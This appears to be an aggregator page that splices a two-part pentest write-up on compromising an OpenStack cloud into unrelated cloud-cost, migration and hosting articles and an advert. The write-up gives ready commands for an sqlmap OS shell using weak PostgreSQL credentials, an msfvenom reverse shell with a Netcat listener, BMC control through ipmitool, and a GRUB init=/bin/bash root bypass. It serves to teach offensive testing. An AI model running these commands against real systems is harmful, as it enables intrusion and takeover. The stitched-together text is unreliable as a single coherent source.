In this write-up we’ll see how we combined sqlmap’s direct database connection feature with BMC/IPMI exploitation to compromise a large cloud-hosted client.
A couple of years ago, our team was tasked with performing an infrastructure pentest on an OpenStack network. It consisted of about 2,000 physical servers hosting over 25,000 virtual instances. We started the pentest from a small subnet that didn’t allow much outbound traffic. A quick Nmap scan turned up no simple vulnerabilities to exploit, so we started looking into the services available to us. Among them, we found an exposed PostgreSQL server, hosted on a development machine. After building a custom wordlist with multiple derivations of the company’s name, we were able to log in with fairly trivial credentials. The username was postgres, and, to protect this company’s anonymity, let’s say that the password was “admin”.
We proceeded to use sqlmap (https://github.com/sqlmapproject/sqlmap). This tool was created to exploit SQL injections, but it can also give you several options when establishing a direct connection to the database (when you have the credentials). One of these options is starting a command shell on the exploited database.
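As a sketch, a direct connection with sqlmap looks like the following. The IP address, port and database name are made up for illustration; `-d` takes a DBMS connection string, and `--os-shell` tells sqlmap to try to spawn an operating-system command shell on the database server:

```shell
# Connect directly to the PostgreSQL server (no SQL injection involved)
# and attempt to get an OS command shell on it.
# Host, port and database name below are hypothetical.
sqlmap -d "postgresql://postgres:admin@10.13.37.10:5432/devdb" --os-shell
```

With valid credentials, sqlmap skips the injection phase entirely and goes straight to its post-exploitation features.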
After testing the shell, we decided to put together a custom payload in order to receive a reverse shell, to work more comfortably.
To do this, we started assembling a payload with msfvenom. In this case, the payload was a reverse TCP shell for an x64 Linux machine (as the previous image shows, we had to match the database server’s architecture).
Putting together the payload with msfvenom
An advantage of using this payload is that you can catch the connect-back with a simple Netcat listener. Most other payloads require something like Metasploit’s exploit/multi/handler module to receive the reverse connection.
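For illustration, generating such a payload and catching it could look like this. The attacker IP and port are hypothetical; `linux/x64/shell_reverse_tcp` is a stageless payload, which is why a plain `nc` listener is enough (staged variants like `linux/x64/shell/reverse_tcp` need Metasploit’s handler to send the second stage):

```shell
# Build a stageless x64 Linux reverse TCP shell as an ELF binary.
# LHOST/LPORT (the attacker's IP and port) are hypothetical.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.13.37.99 LPORT=4444 -f elf -o rev.elf

# On the attacker machine, a plain Netcat listener catches the shell:
nc -lvnp 4444
```

The resulting `rev.elf` is what gets uploaded and executed through the sqlmap shell.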
After running the payload with the sqlmap shell, we got our connection from the server.
#security #infosec #pentesting #red-team #devops #cloud
A multi-cloud approach means leveraging two or more cloud platforms to meet the various business requirements of an enterprise. A multi-cloud IT environment incorporates clouds from multiple vendors and removes dependence on a single public cloud service provider. Enterprises can thus choose specific services from multiple public clouds and reap the benefits of each.
Given its affordability and agility, most enterprises opt for a multi-cloud approach in cloud computing now. A 2018 survey on the public cloud services market points out that 81% of the respondents use services from two or more providers. Subsequently, the cloud computing services market has reported incredible growth in recent times. The worldwide public cloud services market is all set to reach $500 billion in the next four years, according to IDC.
By choosing multi-cloud solutions strategically, enterprises can optimize the benefits of cloud computing and gain some key competitive advantages. They can avoid the lengthy, cumbersome processes involved in buying, installing and testing high-priced systems. IaaS and PaaS solutions have become a windfall for enterprise budgets, since they do not incur huge up-front capital expenditure.
However, cost optimization remains a challenge when running a multi-cloud environment, and a large number of enterprises end up overpaying, whether they realize it or not. The tips below will help you ensure your money is spent wisely on cloud computing services.
Most organizations get simple things wrong, and these turn out to be the root cause of needless spending and resource wastage. The first step to cost optimization in your cloud strategy is to identify underutilized resources that you have been paying for.
Enterprises often continue to pay for resources that were purchased earlier but are no longer useful. Identifying such unused and unattached resources and deactivating them on a regular basis brings you one step closer to cost optimization. If needed, you can deploy automated cloud management tools, which are largely helpful in providing the analytics needed to optimize cloud spending and cut costs on an ongoing basis.
Another key cost optimization strategy is to identify idle computing instances and consolidate them into fewer instances. An idle computing instance may sit at a CPU utilization level of 1–5%, yet the service provider bills you for 100% of that instance.
Every enterprise has such non-production instances, which consume unnecessary storage space and lead to overpaying. Re-evaluating your resource allocations regularly and removing unnecessary storage can save you money significantly. Resource allocation is not only a matter of CPU and memory; it is also linked to storage, network, and various other factors.
The key to efficient cost reduction in cloud computing technology lies in proactive monitoring. A comprehensive view of the cloud usage helps enterprises to monitor and minimize unnecessary spending. You can make use of various mechanisms for monitoring computing demand.
For instance, you can use a heatmap to visualize the highs and lows in computing demand. The heatmap shows when instances start and stop being used, which in turn points to cost savings: by following it, you can tell whether it is safe to shut down servers on holidays or weekends. You can also deploy automated tools that schedule instances to start and stop accordingly.
#cloud computing services #all #hybrid cloud #cloud #multi-cloud strategy #cloud spend #multi-cloud spending #multi cloud adoption #why multi cloud #multi cloud trends #multi cloud companies #multi cloud research #multi cloud market
Moving applications, databases and other business elements from a local server to a cloud server is called cloud migration. This article will deal with migration techniques, requirements and the benefits of cloud migration.
In simple terms, moving from a local to a public cloud server is called cloud migration. Gartner projects 17.5% revenue growth for cloud migration and has also published a forecast through 2022, as shown in the following image.
#cloud computing services #cloud migration #all #cloud #cloud migration strategy #enterprise cloud migration strategy #business benefits of cloud migration #key benefits of cloud migration #benefits of cloud migration #types of cloud migration
We strive to provide every customer business in the USA with Google Cloud hosting web services and managed services that are entirely personalized around the company’s commercial and development goals. Businesses that work with us will see a marked improvement in efficiency. Managed Google Cloud Platform services from SISGAIN help organisations leverage this relative newcomer’s big data and machine learning capabilities via our team of approachable experts. From solution design to in-life support, we take the operational burden off dev and product development teams. For more information call us at +18444455767 or email us at firstname.lastname@example.org
#google cloud platform services #google cloud hosting web services #google cloud web hosting #gcp web hosting #google cloud server hosting #google vps hosting
Hosting a website these days has boiled down to picking between two major options: Cloud Hosting and Dedicated Hosting.
Naturally, there are also shared hosting and virtual private server platforms, but any website owner with half-decent knowledge of web hosting knows that cloud and dedicated hosting are unbeatable options for the practical purposes of scalability and uptime guarantees.
There has never been a better time to build a website. With the fluid options made accessible by cloud platforms that can integrate custom dedicated server capabilities, small businesses can now optimize enterprise-grade features that are still within their budget range.
Some hosting providers and website builders like Wix even provide free web hosting to clients without compromising standard industry features like website security and optimal uptime guarantee.
Any serious website owner eventually faces the debate of whether to use a cloud hosting option or to go with a dedicated server. Both options have their advantages and guarantee website stability, fast loading speeds under high traffic, broad compatibility with software and applications, and data security.
But the two platforms do have their differences, and each is optimal for different use cases. The avant-garde nature of cloud hosting plans is, however, closing this gap, and we’re getting closer to a world where complex custom web server requirements can be met by cloud solutions.
We won’t be able to fully understand the advantages that flexible cloud solutions have over dedicated servers without first understanding the dynamics of both platforms.
#web-hosting #cloud-web-hosting #cloud hosting #cloud
In part 1 we briefly explained how we got administrator privileges on almost all the BMC devices hosting a native OpenStack cloud. In this part we’ll show how we used them to achieve complete compromise.
If you’ve read up on BMC devices, by now you’ll know that they allow you to remotely manage the attached servers: power them on and off, change boot devices, and access their consoles. This is great and all, but it only simulates physical access to the server; you still need to get inside. Yes, you could DoS the servers by shutting them down, but we thought that this wasn’t enough, so we kept digging.
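As a sketch of what that remote control looks like, `ipmitool` can drive a BMC over the network. The IP address and credentials below are hypothetical:

```shell
# Query and control the server's power state through the BMC,
# using IPMI-over-LAN (the lanplus interface).
ipmitool -I lanplus -H 10.0.100.5 -U ADMIN -P ADMIN power status
ipmitool -I lanplus -H 10.0.100.5 -U ADMIN -P ADMIN power off

# Serial-over-LAN attaches you to the server's console,
# as if you were standing in front of the machine.
ipmitool -I lanplus -H 10.0.100.5 -U ADMIN -P ADMIN sol activate
```

This combination — power control plus console access — is what makes the boot-time attack in the next section possible.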
One of the most common ways of compromising a machine when you have physical access is rebooting it and manipulating the startup in order to come up with a root shell. You can do this on Unix, Mac and Windows alike.
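On a typical Linux server booting through GRUB, this manipulation is a one-line change: at the GRUB menu, press `e` to edit the boot entry, append `init=/bin/bash` to the kernel line, and boot with Ctrl-X. A minimal sketch (kernel path and root device are illustrative):

```shell
# In the GRUB editor, the kernel line ends up looking something like:
#   linux /vmlinuz-5.4.0 root=/dev/sda1 ro init=/bin/bash
# The kernel then runs bash as PID 1 instead of the normal init,
# dropping you into a root shell before any login prompt appears.

# The root filesystem comes up read-only, so remount it to make changes:
mount -o remount,rw /
passwd root   # e.g. reset the root password, then reboot normally
```

Over a BMC this works exactly as it would at a physical keyboard, since serial-over-LAN gives you the console during boot.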
The caveat of this approach was that each server was usually hosting about 2000 virtual hosts. So we needed to find a server that wasn’t in use. The plan was to shut it down (or just start it up, if it was already down) and edit the startup to give us root access. After that, we wanted to take a look at the configuration for any mistakes or useful data that would allow us to compromise other servers as well.
OpenStack allows you to query the local infrastructure and request certain parameters. One of these is the state of the instance, which in this company’s case was defined as the availability of the instance (whitelisted / blacklisted to receive traffic) plus the running state (up / down).
We needed to find a blacklisted server (the running state didn’t matter). We managed to find one with disk issues that was down. Luckily, we were able to boot it, with the caveat that certain parts of the filesystem were in read-only mode.
Querying openstack for the appropriate server to compromise
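A query along those lines with the OpenStack CLI might look like the following sketch. How “blacklisted” maps onto OpenStack fields depends on the deployment; here we assume the nova-compute service status (enabled/disabled) plays that role, alongside the up/down state:

```shell
# List nova-compute services across the hosts: the Status column
# (enabled/disabled) roughly maps to the whitelist/blacklist notion,
# and the State column (up/down) to the running state.
openstack compute service list --service nova-compute

# Instances that are currently shut off can be listed directly:
openstack server list --status SHUTOFF -f value -c ID -c Name
```

From output like this, a disabled host or a shut-off instance is a candidate target that nobody is likely to be watching.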
Once we found it, we logged in with the previously cracked credentials.
Using the credentials obtained on part 1
#red-team #devops #infosec #pentesting #security #cloud